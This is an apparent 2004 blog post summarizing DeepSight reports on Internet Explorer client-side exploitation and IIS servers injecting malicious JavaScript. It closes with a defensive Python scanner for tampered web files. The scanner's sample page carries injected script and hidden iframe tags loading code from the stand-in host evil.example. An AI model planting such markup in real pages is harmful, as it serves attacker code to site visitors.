Saturday, June 26, 2004

VIRUS: Overview of Client-side Exploitation

DeepSight Threat Management System - Overview of Client-side Exploitation: "DeepSight Threat Management System Overview of Recent Targeted and Wormed Client-side Exploitation"

Client-side exploitation, while not new, has recently become a serious threat. Several known but unpatched vulnerabilities in Internet Explorer are being actively exploited. The DeepSight Threat Analyst team has observed this high-profile exploitation both by worms and by targeted attacks. We are releasing these documents from the DeepSight Threat Management System to the public with the goal of bringing attention to these threats.

Client-side Exploits: Forensic Analysis of a Compromised Financial Services Laptop

This document details the forensic analysis of a machine compromised through the use of a client-side vulnerability. The evidence gathered in this analysis strongly suggests that the client-side attack was used to specifically target a financial institution, with the goal of retrieving the authentication credentials needed to escalate the initial compromise to other related systems. The analysis provides a real-world example of a targeted attack against a specific company, in this case one in the Financial Services sector, carried out through a client-side attack vector. Although not new, the targeted exploitation of client-side vulnerabilities has not seen extensive documentation or analysis. This analysis aims to give the reader a detailed description of an actual attack exploiting a client-side vulnerability.

Compromised IIS Server / Unpatched Internet Explorer Vulnerability Exploitation Alert

The DeepSight Threat Analyst Team has become aware of various public reports of Microsoft Internet Information Services (IIS) servers being attacked and subsequently compromised. As a second component of the compromise, a malicious JavaScript is hosted on the infected IIS system and inserted into files served from that system. This document contains information about the vulnerabilities used and the subsequently deployed malcode that is not available elsewhere. The malicious JavaScript in question is designed to compromise client systems through multiple known but unpatched vulnerabilities in Internet Explorer. The resulting client-side infection includes, among other things, a keystroke logger. The Threat Analyst Team has manually captured a sample of the IE exploit, and the resulting binary, in the DeepSight Honeynet system. Further investigation of the exploit resulted in the conclusions described below. UPDATE: This Threat Alert has been updated to include additional information about the client-side exploits used in this attack. Additional information about other associated files has also been added.
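The alert above describes the server-side half of the attack: a compromised IIS host with malicious JavaScript inserted into the files it serves. A web-server administrator can catch that pattern from the defender's side by combining a known-good file-integrity baseline with a scan of served HTML for script or iframe references pointing off-site. The script below is an added example written for this page, not code from DeepSight or from the alert; the sample pages, the `www.bank.example` and `evil.example` host names, and the `demo()` layout are all constructed.

```python
"""Detect injected script/iframe references in files served by a web server.

Added example, not part of the DeepSight alert. Combines two checks a site
operator can run: a SHA-256 baseline of the web root taken when the content
is known-good, and a parse of each served HTML file for <script>/<iframe>
elements whose source host is not on an allow-list.
"""
import hashlib
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a clean login page that only references same-origin assets.
CLEAN_PAGE = """<html><head><title>Account login</title>
<script src="/js/app.js"></script></head>
<body><form action="/login">...</form></body></html>"""

# Constructed sample: the same page with references appended after </html>,
# the way a blind server-side file modification typically leaves it.
INJECTED_PAGE = CLEAN_PAGE + (
    '\n<script src="//evil.example/x.js"></script>'
    '\n<iframe src="http://evil.example/i.html" width="0" height="0"></iframe>'
)


class _RefCollector(HTMLParser):
    """Collect the src attribute of every <script> and <iframe> element."""

    def __init__(self):
        super().__init__()
        self.refs = []  # list of (tag, src) in document order

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src))


def find_offsite_refs(html, allowed_hosts):
    """Return (tag, src) pairs whose host is absent from allowed_hosts.

    Relative URLs have no host and are same-origin, so they are not reported.
    Protocol-relative URLs (//host/path) do carry a host and are checked.
    """
    parser = _RefCollector()
    parser.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    return [(tag, src) for tag, src in parser.refs
            if (host := urlparse(src).hostname) and host.lower() not in allowed]


def sha256_file(path):
    """SHA-256 of a file, read in chunks so large assets do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root):
    """Map each file under root (path relative to root) to its SHA-256."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            out[os.path.relpath(full, root)] = sha256_file(full)
    return out


def scan_webroot(root, allowed_hosts, baseline):
    """Return (changed, offsite).

    changed: sorted relative paths whose hash differs from, or is missing in, baseline.
    offsite: {relative path: [(tag, src), ...]} for served HTML with off-site refs.
    """
    current = snapshot(root)
    changed = sorted(p for p, h in current.items() if baseline.get(p) != h)
    offsite = {}
    for rel in current:
        if rel.lower().endswith((".html", ".htm", ".asp", ".aspx")):
            with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
                hits = find_offsite_refs(fh.read(), allowed_hosts)
            if hits:
                offsite[rel] = hits
    return changed, offsite


def demo():
    """Constructed end-to-end run: baseline a clean site, tamper one file, rescan."""
    with tempfile.TemporaryDirectory() as root:
        for name in ("index.html", "login.html"):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(CLEAN_PAGE)
        baseline = snapshot(root)  # taken while the content is known-good
        with open(os.path.join(root, "login.html"), "w", encoding="utf-8") as fh:
            fh.write(INJECTED_PAGE)  # simulate the server-side modification
        return scan_webroot(root, {"www.bank.example"}, baseline)


if __name__ == "__main__":
    changed_files, offsite_refs = demo()
    print("changed since baseline:", changed_files)
    print("off-site references:", offsite_refs)
```

In practice the baseline is stored off the server (an attacker who can modify served files can also modify a hash list kept beside them), and the allow-list holds the site's own hostnames and any CDNs it legitimately uses. The hash check catches any modification, including ones the HTML parser would miss; the reference scan tells you which changed files are actually pulling content from elsewhere.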
